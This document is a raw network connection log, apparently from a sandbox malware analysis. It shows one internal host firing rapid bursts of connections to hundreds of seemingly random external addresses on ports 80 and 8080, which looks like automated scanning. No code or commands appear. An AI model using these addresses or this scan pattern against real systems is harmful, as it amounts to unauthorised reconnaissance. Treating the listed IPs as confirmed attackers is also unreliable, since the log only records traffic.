Feb 14, 2024 09:28:47.821935892 CET	80	60806	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:47.821953058 CET	80	60806	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:47.822007895 CET	60806	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.822007895 CET	60806	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.822643042 CET	80	60828	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:47.822695017 CET	60828	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.822721004 CET	60828	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.824511051 CET	8080	49732	31.136.153.210	192.168.2.15
Feb 14, 2024 09:28:47.824553967 CET	8080	6752	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:47.824587107 CET	49732	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:47.824598074 CET	6752	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.824712992 CET	49732	8080	192.168.2.15	31.136.153.210
Feb 14, 2024 09:28:47.824824095 CET	35590	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.829581022 CET	80	52484	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:47.830832958 CET	80	52506	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:47.830884933 CET	52506	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.830907106 CET	52506	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.839771032 CET	8080	38508	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:47.839899063 CET	80	52484	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:47.839915037 CET	80	52484	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:47.839951038 CET	52484	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.839967012 CET	52484	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.840061903 CET	8080	38508	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:47.840080976 CET	8080	38508	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:47.840096951 CET	8080	38508	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:47.840116024 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.840159893 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.840159893 CET	38508	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.840976954 CET	8080	38576	95.143.69.65	192.168.2.15
Feb 14, 2024 09:28:47.841028929 CET	38576	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.841043949 CET	38576	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:47.842442989 CET	8080	58958	31.136.107.17	192.168.2.15
Feb 14, 2024 09:28:47.842495918 CET	58958	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:47.842495918 CET	58958	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:47.856317043 CET	8080	35576	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:47.856411934 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.856411934 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.856431961 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.856477022 CET	35592	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.857058048 CET	80	52620	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.857074022 CET	80	52620	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.857089996 CET	80	52620	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.857217073 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.857217073 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.857956886 CET	80	52620	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.858006954 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.862078905 CET	8080	39042	31.136.242.67	192.168.2.15
Feb 14, 2024 09:28:47.862139940 CET	39042	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:47.862164021 CET	39042	8080	192.168.2.15	31.136.242.67
Feb 14, 2024 09:28:47.863631964 CET	80	52642	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.863689899 CET	52642	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.863711119 CET	52642	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.871054888 CET	80	54268	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:47.872668028 CET	80	54290	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:47.872742891 CET	54290	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.872742891 CET	54290	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.880943060 CET	80	54268	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:47.881067991 CET	54268	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.886203051 CET	80	57552	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:47.886281013 CET	57552	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.896265984 CET	8080	55712	94.123.65.84	192.168.2.15
Feb 14, 2024 09:28:47.896315098 CET	8080	55684	94.123.65.84	192.168.2.15
Feb 14, 2024 09:28:47.896522045 CET	55712	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:47.896522045 CET	55712	8080	192.168.2.15	94.123.65.84
Feb 14, 2024 09:28:47.897937059 CET	8080	58922	94.122.18.192	192.168.2.15
Feb 14, 2024 09:28:47.897994995 CET	58922	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.898025990 CET	58922	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.898025990 CET	58922	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.898056984 CET	58934	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.994834900 CET	80	36418	95.58.76.157	192.168.2.15
Feb 14, 2024 09:28:47.994874001 CET	80	36418	95.58.76.157	192.168.2.15
Feb 14, 2024 09:28:47.995152950 CET	36418	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.998732090 CET	80	36418	95.58.76.157	192.168.2.15
Feb 14, 2024 09:28:48.000160933 CET	36418	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:48.000751972 CET	80	60142	95.101.201.148	192.168.2.15
Feb 14, 2024 09:28:48.001204967 CET	60142	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:48.001638889 CET	80	36454	95.58.76.157	192.168.2.15
Feb 14, 2024 09:28:48.001718044 CET	36454	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:48.001780033 CET	36454	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:48.007874012 CET	80	34826	95.111.218.63	192.168.2.15
Feb 14, 2024 09:28:48.007930040 CET	34826	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:48.007951975 CET	34826	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:48.007983923 CET	7840	80	192.168.2.15	112.136.102.188
Feb 14, 2024 09:28:48.007987976 CET	80	34790	95.111.218.63	192.168.2.15
Feb 14, 2024 09:28:48.007992029 CET	7840	80	192.168.2.15	112.10.187.214
Feb 14, 2024 09:28:48.008008003 CET	7840	80	192.168.2.15	112.106.187.143
Feb 14, 2024 09:28:48.008016109 CET	80	34790	95.111.218.63	192.168.2.15
Feb 14, 2024 09:28:48.008033037 CET	80	34790	95.111.218.63	192.168.2.15
Feb 14, 2024 09:28:48.008042097 CET	7840	80	192.168.2.15	112.41.57.86
Feb 14, 2024 09:28:48.008044004 CET	7840	80	192.168.2.15	112.3.25.183
Feb 14, 2024 09:28:48.008076906 CET	34790	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:48.008076906 CET	34790	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:48.008090973 CET	7840	80	192.168.2.15	112.238.13.187
Feb 14, 2024 09:28:48.008115053 CET	7840	80	192.168.2.15	112.22.84.222
Feb 14, 2024 09:28:48.008124113 CET	7840	80	192.168.2.15	112.218.242.7
Feb 14, 2024 09:28:48.008124113 CET	7840	80	192.168.2.15	112.159.141.80
Feb 14, 2024 09:28:48.008133888 CET	7840	80	192.168.2.15	112.135.169.234
Feb 14, 2024 09:28:48.008160114 CET	7840	80	192.168.2.15	112.253.228.114
Feb 14, 2024 09:28:48.008183002 CET	7840	80	192.168.2.15	112.181.214.82
Feb 14, 2024 09:28:48.008194923 CET	7840	80	192.168.2.15	112.59.174.88
Feb 14, 2024 09:28:48.008207083 CET	7840	80	192.168.2.15	112.12.25.176
Feb 14, 2024 09:28:48.008234978 CET	7840	80	192.168.2.15	112.177.124.201
Feb 14, 2024 09:28:48.008249998 CET	7840	80	192.168.2.15	112.226.198.52
Feb 14, 2024 09:28:48.008256912 CET	7840	80	192.168.2.15	112.173.109.96
Feb 14, 2024 09:28:48.008270979 CET	7840	80	192.168.2.15	112.99.152.106
Feb 14, 2024 09:28:48.008285046 CET	7840	80	192.168.2.15	112.153.79.175
Feb 14, 2024 09:28:48.008301973 CET	7840	80	192.168.2.15	112.204.62.42
Feb 14, 2024 09:28:48.008326054 CET	7840	80	192.168.2.15	112.89.13.110
Feb 14, 2024 09:28:48.008332014 CET	7840	80	192.168.2.15	112.92.237.92
Feb 14, 2024 09:28:48.008349895 CET	7840	80	192.168.2.15	112.198.62.229
Feb 14, 2024 09:28:48.008362055 CET	7840	80	192.168.2.15	112.200.177.23
Feb 14, 2024 09:28:48.008379936 CET	7840	80	192.168.2.15	112.176.59.22
Feb 14, 2024 09:28:48.008380890 CET	7840	80	192.168.2.15	112.32.199.201
Feb 14, 2024 09:28:48.008399963 CET	7840	80	192.168.2.15	112.178.228.38
Feb 14, 2024 09:28:48.008409977 CET	7840	80	192.168.2.15	112.128.74.228
Feb 14, 2024 09:28:48.008429050 CET	7840	80	192.168.2.15	112.103.65.135
Feb 14, 2024 09:28:48.008430958 CET	7840	80	192.168.2.15	112.249.20.206
Feb 14, 2024 09:28:48.008447886 CET	7840	80	192.168.2.15	112.99.111.95
Feb 14, 2024 09:28:48.008465052 CET	7840	80	192.168.2.15	112.136.217.46
Feb 14, 2024 09:28:48.008470058 CET	7840	80	192.168.2.15	112.225.40.18
Feb 14, 2024 09:28:48.008487940 CET	7840	80	192.168.2.15	112.154.245.253
Feb 14, 2024 09:28:48.008506060 CET	7840	80	192.168.2.15	112.63.221.72
Feb 14, 2024 09:28:48.008527040 CET	7840	80	192.168.2.15	112.56.86.175
Feb 14, 2024 09:28:48.008533001 CET	7840	80	192.168.2.15	112.80.243.108
Feb 14, 2024 09:28:48.008548975 CET	7840	80	192.168.2.15	112.42.0.64
Feb 14, 2024 09:28:48.008548975 CET	7840	80	192.168.2.15	112.24.217.238
Feb 14, 2024 09:28:48.008568048 CET	7840	80	192.168.2.15	112.50.196.127
Feb 14, 2024 09:28:48.008583069 CET	7840	80	192.168.2.15	112.0.167.50
Feb 14, 2024 09:28:48.008599043 CET	7840	80	192.168.2.15	112.131.33.216
Feb 14, 2024 09:28:48.008614063 CET	7840	80	192.168.2.15	112.55.9.171
Feb 14, 2024 09:28:48.008625984 CET	7840	80	192.168.2.15	112.1.227.235
Feb 14, 2024 09:28:48.008639097 CET	7840	80	192.168.2.15	112.39.215.150
Feb 14, 2024 09:28:48.008651018 CET	7840	80	192.168.2.15	112.171.173.182
Feb 14, 2024 09:28:48.008667946 CET	7840	80	192.168.2.15	112.73.162.0
Feb 14, 2024 09:28:48.008673906 CET	7840	80	192.168.2.15	112.173.38.215
Feb 14, 2024 09:28:48.008690119 CET	7840	80	192.168.2.15	112.145.33.254
Feb 14, 2024 09:28:48.008711100 CET	7840	80	192.168.2.15	112.68.31.83
Feb 14, 2024 09:28:48.008711100 CET	7840	80	192.168.2.15	112.67.70.167
Feb 14, 2024 09:28:48.008722067 CET	7840	80	192.168.2.15	112.89.3.16
Feb 14, 2024 09:28:48.008740902 CET	7840	80	192.168.2.15	112.56.226.37
Feb 14, 2024 09:28:48.008749962 CET	7840	80	192.168.2.15	112.14.141.34
Feb 14, 2024 09:28:48.008759022 CET	7840	80	192.168.2.15	112.183.209.227
Feb 14, 2024 09:28:48.008773088 CET	7840	80	192.168.2.15	112.208.236.231
Feb 14, 2024 09:28:48.008793116 CET	7840	80	192.168.2.15	112.73.102.1
Feb 14, 2024 09:28:48.008816004 CET	7840	80	192.168.2.15	112.184.41.214
Feb 14, 2024 09:28:48.008827925 CET	7840	80	192.168.2.15	112.207.15.25
Feb 14, 2024 09:28:48.008836031 CET	7840	80	192.168.2.15	112.176.109.45
Feb 14, 2024 09:28:48.008850098 CET	7840	80	192.168.2.15	112.55.161.4
Feb 14, 2024 09:28:48.008860111 CET	7840	80	192.168.2.15	112.254.161.27
Feb 14, 2024 09:28:48.008872032 CET	7840	80	192.168.2.15	112.0.182.211
Feb 14, 2024 09:28:48.008887053 CET	7840	80	192.168.2.15	112.246.71.205
Feb 14, 2024 09:28:48.008893013 CET	7840	80	192.168.2.15	112.95.16.71
Feb 14, 2024 09:28:48.008908033 CET	7840	80	192.168.2.15	112.247.10.104
Feb 14, 2024 09:28:48.008920908 CET	7840	80	192.168.2.15	112.227.5.128
Feb 14, 2024 09:28:48.008940935 CET	7840	80	192.168.2.15	112.214.207.73
Feb 14, 2024 09:28:48.008945942 CET	7840	80	192.168.2.15	112.66.245.200
Feb 14, 2024 09:28:48.008965015 CET	7840	80	192.168.2.15	112.244.236.231
Feb 14, 2024 09:28:48.008975029 CET	7840	80	192.168.2.15	112.18.78.240
Feb 14, 2024 09:28:48.008990049 CET	7840	80	192.168.2.15	112.32.77.122
Feb 14, 2024 09:28:48.009002924 CET	7840	80	192.168.2.15	112.29.223.11
Feb 14, 2024 09:28:48.009018898 CET	7840	80	192.168.2.15	112.66.203.217
Feb 14, 2024 09:28:48.009042978 CET	7840	80	192.168.2.15	112.54.8.179
Feb 14, 2024 09:28:48.009042978 CET	7840	80	192.168.2.15	112.13.85.125
Feb 14, 2024 09:28:48.009048939 CET	7840	80	192.168.2.15	112.213.147.165
Feb 14, 2024 09:28:48.009067059 CET	7840	80	192.168.2.15	112.95.118.96
Feb 14, 2024 09:28:48.009079933 CET	7840	80	192.168.2.15	112.28.58.243
Feb 14, 2024 09:28:48.009104013 CET	7840	80	192.168.2.15	112.159.47.233
Feb 14, 2024 09:28:48.009119987 CET	7840	80	192.168.2.15	112.253.114.160
Feb 14, 2024 09:28:48.009134054 CET	7840	80	192.168.2.15	112.183.27.124
Feb 14, 2024 09:28:48.009150982 CET	7840	80	192.168.2.15	112.55.151.82
Feb 14, 2024 09:28:48.009160995 CET	7840	80	192.168.2.15	112.161.152.107
Feb 14, 2024 09:28:48.009172916 CET	7840	80	192.168.2.15	112.223.179.19
Feb 14, 2024 09:28:48.009182930 CET	7840	80	192.168.2.15	112.181.175.139
Feb 14, 2024 09:28:48.009205103 CET	7840	80	192.168.2.15	112.187.153.116
Feb 14, 2024 09:28:48.009205103 CET	7840	80	192.168.2.15	112.136.80.54
Feb 14, 2024 09:28:48.009227991 CET	7840	80	192.168.2.15	112.235.204.83
Feb 14, 2024 09:28:48.009239912 CET	7840	80	192.168.2.15	112.237.60.187
Feb 14, 2024 09:28:48.009255886 CET	7840	80	192.168.2.15	112.111.119.154
Feb 14, 2024 09:28:48.009269953 CET	7840	80	192.168.2.15	112.26.8.94
Feb 14, 2024 09:28:48.009289026 CET	7840	80	192.168.2.15	112.58.206.88
Feb 14, 2024 09:28:48.009290934 CET	7840	80	192.168.2.15	112.59.18.84
Feb 14, 2024 09:28:48.009306908 CET	7840	80	192.168.2.15	112.166.212.55
Feb 14, 2024 09:28:48.009331942 CET	7840	80	192.168.2.15	112.198.105.31
Feb 14, 2024 09:28:48.009344101 CET	7840	80	192.168.2.15	112.17.136.46
Feb 14, 2024 09:28:48.009346008 CET	7840	80	192.168.2.15	112.47.48.108
Feb 14, 2024 09:28:48.009366989 CET	7840	80	192.168.2.15	112.207.186.71
Feb 14, 2024 09:28:48.009371042 CET	7840	80	192.168.2.15	112.219.0.118
Feb 14, 2024 09:28:48.009392023 CET	7840	80	192.168.2.15	112.102.217.221
Feb 14, 2024 09:28:48.009407997 CET	7840	80	192.168.2.15	112.210.82.137
Feb 14, 2024 09:28:48.009422064 CET	7840	80	192.168.2.15	112.137.201.150
Feb 14, 2024 09:28:48.009433985 CET	7840	80	192.168.2.15	112.162.134.53
Feb 14, 2024 09:28:48.009450912 CET	7840	80	192.168.2.15	112.104.38.12
Feb 14, 2024 09:28:48.009462118 CET	7840	80	192.168.2.15	112.206.96.239
Feb 14, 2024 09:28:48.009475946 CET	7840	80	192.168.2.15	112.63.43.240
Feb 14, 2024 09:28:48.009490013 CET	7840	80	192.168.2.15	112.2.198.98
Feb 14, 2024 09:28:48.009501934 CET	7840	80	192.168.2.15	112.108.53.237
Feb 14, 2024 09:28:48.009521961 CET	7840	80	192.168.2.15	112.0.254.247
Feb 14, 2024 09:28:48.009535074 CET	7840	80	192.168.2.15	112.158.238.151
Feb 14, 2024 09:28:48.009547949 CET	7840	80	192.168.2.15	112.240.253.145
Feb 14, 2024 09:28:48.009562969 CET	7840	80	192.168.2.15	112.114.43.121
Feb 14, 2024 09:28:48.009576082 CET	7840	80	192.168.2.15	112.5.188.163
Feb 14, 2024 09:28:48.009589911 CET	7840	80	192.168.2.15	112.194.80.190
Feb 14, 2024 09:28:48.009602070 CET	7840	80	192.168.2.15	112.255.3.250
Feb 14, 2024 09:28:48.009622097 CET	7840	80	192.168.2.15	112.169.120.242
Feb 14, 2024 09:28:48.009637117 CET	7840	80	192.168.2.15	112.225.15.30
Feb 14, 2024 09:28:48.009649992 CET	7840	80	192.168.2.15	112.112.52.46
Feb 14, 2024 09:28:48.009660959 CET	7840	80	192.168.2.15	112.37.248.22
Feb 14, 2024 09:28:48.009675980 CET	7840	80	192.168.2.15	112.54.224.47
Feb 14, 2024 09:28:48.009692907 CET	7840	80	192.168.2.15	112.119.80.118
Feb 14, 2024 09:28:48.009715080 CET	7840	80	192.168.2.15	112.160.215.6
Feb 14, 2024 09:28:48.009727955 CET	7840	80	192.168.2.15	112.247.156.54
Feb 14, 2024 09:28:48.009741068 CET	7840	80	192.168.2.15	112.199.37.25
Feb 14, 2024 09:28:48.009758949 CET	7840	80	192.168.2.15	112.130.61.125
Feb 14, 2024 09:28:48.009767056 CET	7840	80	192.168.2.15	112.159.222.91
Feb 14, 2024 09:28:48.009778976 CET	7840	80	192.168.2.15	112.249.103.47
Feb 14, 2024 09:28:48.009793043 CET	7840	80	192.168.2.15	112.124.150.93
Feb 14, 2024 09:28:48.009809017 CET	7840	80	192.168.2.15	112.122.28.45
Feb 14, 2024 09:28:48.009823084 CET	7840	80	192.168.2.15	112.171.201.239
Feb 14, 2024 09:28:48.009833097 CET	7840	80	192.168.2.15	112.142.214.40
Feb 14, 2024 09:28:48.009845018 CET	7840	80	192.168.2.15	112.243.50.26
Feb 14, 2024 09:28:48.009866953 CET	7840	80	192.168.2.15	112.17.254.214
Feb 14, 2024 09:28:48.009866953 CET	7840	80	192.168.2.15	112.58.219.251
Feb 14, 2024 09:28:48.009880066 CET	7840	80	192.168.2.15	112.163.162.135
Feb 14, 2024 09:28:48.009898901 CET	7840	80	192.168.2.15	112.132.9.63
Feb 14, 2024 09:28:48.009924889 CET	7840	80	192.168.2.15	112.64.219.148
Feb 14, 2024 09:28:48.009926081 CET	7840	80	192.168.2.15	112.145.87.190
Feb 14, 2024 09:28:48.009943962 CET	7840	80	192.168.2.15	112.107.87.98
Feb 14, 2024 09:28:48.009959936 CET	7840	80	192.168.2.15	112.2.74.222
Feb 14, 2024 09:28:48.009964943 CET	7840	80	192.168.2.15	112.27.75.31
Feb 14, 2024 09:28:48.009980917 CET	7840	80	192.168.2.15	112.59.86.227
Feb 14, 2024 09:28:48.009994030 CET	7840	80	192.168.2.15	112.184.143.128
Feb 14, 2024 09:28:48.010010958 CET	7840	80	192.168.2.15	112.2.154.165
Feb 14, 2024 09:28:48.010024071 CET	7840	80	192.168.2.15	112.114.234.118
Feb 14, 2024 09:28:48.010039091 CET	7840	80	192.168.2.15	112.254.223.228
Feb 14, 2024 09:28:48.010050058 CET	7840	80	192.168.2.15	112.44.177.175
Feb 14, 2024 09:28:48.010052919 CET	7840	80	192.168.2.15	112.171.22.55
Feb 14, 2024 09:28:48.010075092 CET	7840	80	192.168.2.15	112.91.29.242
Feb 14, 2024 09:28:48.010082960 CET	7840	80	192.168.2.15	112.221.55.93
Feb 14, 2024 09:28:48.010113001 CET	7840	80	192.168.2.15	112.83.156.52
Feb 14, 2024 09:28:48.010128021 CET	7840	80	192.168.2.15	112.242.71.60
Feb 14, 2024 09:28:48.010139942 CET	7840	80	192.168.2.15	112.154.165.20
Feb 14, 2024 09:28:48.010155916 CET	7840	80	192.168.2.15	112.224.175.34
Feb 14, 2024 09:28:48.010166883 CET	7840	80	192.168.2.15	112.211.129.87
Feb 14, 2024 09:28:48.010179996 CET	7840	80	192.168.2.15	112.223.185.245
Feb 14, 2024 09:28:48.010190010 CET	7840	80	192.168.2.15	112.106.48.178
Feb 14, 2024 09:28:48.010202885 CET	7840	80	192.168.2.15	112.82.218.108
Feb 14, 2024 09:28:48.010215998 CET	7840	80	192.168.2.15	112.135.184.41
Feb 14, 2024 09:28:48.031069040 CET	8080	6752	94.44.137.33	192.168.2.15
Feb 14, 2024 09:28:48.031289101 CET	80	45108	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:48.031367064 CET	80	45108	95.100.127.15	192.168.2.15
Feb 14, 2024 09:28:48.031414986 CET	45108	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:48.050573111 CET	8080	35590	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.050750971 CET	35590	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.050915956 CET	6752	8080	192.168.2.15	31.253.82.113
Feb 14, 2024 09:28:48.050915956 CET	6752	8080	192.168.2.15	95.247.91.247
Feb 14, 2024 09:28:48.050932884 CET	6752	8080	192.168.2.15	62.25.73.209
Feb 14, 2024 09:28:48.050939083 CET	6752	8080	192.168.2.15	62.77.100.134
Feb 14, 2024 09:28:48.050951958 CET	6752	8080	192.168.2.15	94.146.52.163
Feb 14, 2024 09:28:48.050952911 CET	6752	8080	192.168.2.15	95.208.57.147
Feb 14, 2024 09:28:48.050956964 CET	6752	8080	192.168.2.15	95.111.70.231
Feb 14, 2024 09:28:48.050956964 CET	6752	8080	192.168.2.15	94.213.126.94
Feb 14, 2024 09:28:48.050981045 CET	6752	8080	192.168.2.15	94.122.99.72
Feb 14, 2024 09:28:48.050981998 CET	6752	8080	192.168.2.15	31.29.206.239
Feb 14, 2024 09:28:48.050981998 CET	6752	8080	192.168.2.15	94.149.170.129
Feb 14, 2024 09:28:48.050981045 CET	6752	8080	192.168.2.15	62.94.135.74
Feb 14, 2024 09:28:48.050985098 CET	6752	8080	192.168.2.15	85.237.79.176
Feb 14, 2024 09:28:48.050993919 CET	6752	8080	192.168.2.15	85.249.29.172
Feb 14, 2024 09:28:48.051002979 CET	6752	8080	192.168.2.15	95.37.54.148
Feb 14, 2024 09:28:48.051011086 CET	6752	8080	192.168.2.15	31.64.46.242
Feb 14, 2024 09:28:48.051019907 CET	6752	8080	192.168.2.15	94.100.208.90
Feb 14, 2024 09:28:48.051019907 CET	6752	8080	192.168.2.15	31.129.249.138
Feb 14, 2024 09:28:48.051022053 CET	6752	8080	192.168.2.15	94.147.166.254
Feb 14, 2024 09:28:48.051026106 CET	6752	8080	192.168.2.15	94.166.45.137
Feb 14, 2024 09:28:48.051029921 CET	6752	8080	192.168.2.15	95.137.191.25
Feb 14, 2024 09:28:48.051035881 CET	6752	8080	192.168.2.15	85.190.23.104
Feb 14, 2024 09:28:48.051037073 CET	6752	8080	192.168.2.15	31.56.243.144
Feb 14, 2024 09:28:48.051038980 CET	80	60828	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:48.051048994 CET	6752	8080	192.168.2.15	94.84.232.171
Feb 14, 2024 09:28:48.051053047 CET	6752	8080	192.168.2.15	31.84.125.114
Feb 14, 2024 09:28:48.051057100 CET	6752	8080	192.168.2.15	31.149.185.131
Feb 14, 2024 09:28:48.051067114 CET	6752	8080	192.168.2.15	95.159.251.20
Feb 14, 2024 09:28:48.051067114 CET	6752	8080	192.168.2.15	85.182.88.111
Feb 14, 2024 09:28:48.051068068 CET	6752	8080	192.168.2.15	95.252.135.132
Feb 14, 2024 09:28:48.051081896 CET	6752	8080	192.168.2.15	62.80.191.197
Feb 14, 2024 09:28:48.051086903 CET	60828	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:48.051100016 CET	6752	8080	192.168.2.15	85.238.250.217
Feb 14, 2024 09:28:48.051109076 CET	6752	8080	192.168.2.15	85.48.67.178
Feb 14, 2024 09:28:48.051109076 CET	6752	8080	192.168.2.15	62.36.99.74
Feb 14, 2024 09:28:48.051109076 CET	6752	8080	192.168.2.15	31.134.192.161
Feb 14, 2024 09:28:48.051110983 CET	6752	8080	192.168.2.15	94.109.76.247
Feb 14, 2024 09:28:48.051120043 CET	6752	8080	192.168.2.15	62.203.172.54
Feb 14, 2024 09:28:48.051182032 CET	6752	8080	192.168.2.15	94.171.121.227
Feb 14, 2024 09:28:48.051182032 CET	6752	8080	192.168.2.15	94.57.37.21
Feb 14, 2024 09:28:48.051184893 CET	6752	8080	192.168.2.15	95.188.254.47
Feb 14, 2024 09:28:48.051184893 CET	6752	8080	192.168.2.15	85.37.197.56
Feb 14, 2024 09:28:48.051186085 CET	6752	8080	192.168.2.15	85.167.168.216
Feb 14, 2024 09:28:48.051187038 CET	6752	8080	192.168.2.15	31.49.214.53
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	62.78.217.32
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	95.139.176.83
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	94.114.15.68
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	31.230.157.36
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	85.102.145.153
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	85.79.211.226
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	62.137.109.235
Feb 14, 2024 09:28:48.051187992 CET	6752	8080	192.168.2.15	85.136.158.10
Feb 14, 2024 09:28:48.051192045 CET	6752	8080	192.168.2.15	62.31.139.205
Feb 14, 2024 09:28:48.051192045 CET	6752	8080	192.168.2.15	31.160.13.67
Feb 14, 2024 09:28:48.051192045 CET	6752	8080	192.168.2.15	62.77.65.137
Feb 14, 2024 09:28:48.051192045 CET	6752	8080	192.168.2.15	85.167.79.142
Feb 14, 2024 09:28:48.051211119 CET	6752	8080	192.168.2.15	62.234.20.101
Feb 14, 2024 09:28:48.051213026 CET	6752	8080	192.168.2.15	94.149.133.17
Feb 14, 2024 09:28:48.051213026 CET	6752	8080	192.168.2.15	62.167.66.168
Feb 14, 2024 09:28:48.051217079 CET	6752	8080	192.168.2.15	85.20.45.255
Feb 14, 2024 09:28:48.051217079 CET	6752	8080	192.168.2.15	95.206.119.53
Feb 14, 2024 09:28:48.051229954 CET	6752	8080	192.168.2.15	94.131.232.192
Feb 14, 2024 09:28:48.051230907 CET	6752	8080	192.168.2.15	31.48.54.31
Feb 14, 2024 09:28:48.051232100 CET	6752	8080	192.168.2.15	95.160.85.33
Feb 14, 2024 09:28:48.051218033 CET	6752	8080	192.168.2.15	31.183.163.37
Feb 14, 2024 09:28:48.051239014 CET	6752	8080	192.168.2.15	31.219.206.223
Feb 14, 2024 09:28:48.051244020 CET	6752	8080	192.168.2.15	95.16.59.70
Feb 14, 2024 09:28:48.051244974 CET	6752	8080	192.168.2.15	62.187.201.31
Feb 14, 2024 09:28:48.051218033 CET	6752	8080	192.168.2.15	85.113.107.124
Feb 14, 2024 09:28:48.051218033 CET	6752	8080	192.168.2.15	85.118.3.168
Feb 14, 2024 09:28:48.051270962 CET	6752	8080	192.168.2.15	95.153.173.233
Feb 14, 2024 09:28:48.051275015 CET	6752	8080	192.168.2.15	85.150.233.215
Feb 14, 2024 09:28:48.051275969 CET	6752	8080	192.168.2.15	62.46.113.186
Feb 14, 2024 09:28:48.051285028 CET	6752	8080	192.168.2.15	62.123.27.190
Feb 14, 2024 09:28:48.051325083 CET	6752	8080	192.168.2.15	85.97.169.67
Feb 14, 2024 09:28:48.051326036 CET	6752	8080	192.168.2.15	94.176.228.206
Feb 14, 2024 09:28:48.051326036 CET	6752	8080	192.168.2.15	95.214.1.76
Feb 14, 2024 09:28:48.051326036 CET	6752	8080	192.168.2.15	94.214.191.69
Feb 14, 2024 09:28:48.051326036 CET	6752	8080	192.168.2.15	94.221.48.246
Feb 14, 2024 09:28:48.051326036 CET	6752	8080	192.168.2.15	94.24.105.141
Feb 14, 2024 09:28:48.051326036 CET	6752	8080	192.168.2.15	62.130.204.12
Feb 14, 2024 09:28:48.051368952 CET	6752	8080	192.168.2.15	62.194.129.67
Feb 14, 2024 09:28:48.051371098 CET	6752	8080	192.168.2.15	94.149.119.11
Feb 14, 2024 09:28:48.051371098 CET	6752	8080	192.168.2.15	31.80.247.176
Feb 14, 2024 09:28:48.051371098 CET	6752	8080	192.168.2.15	62.153.22.237
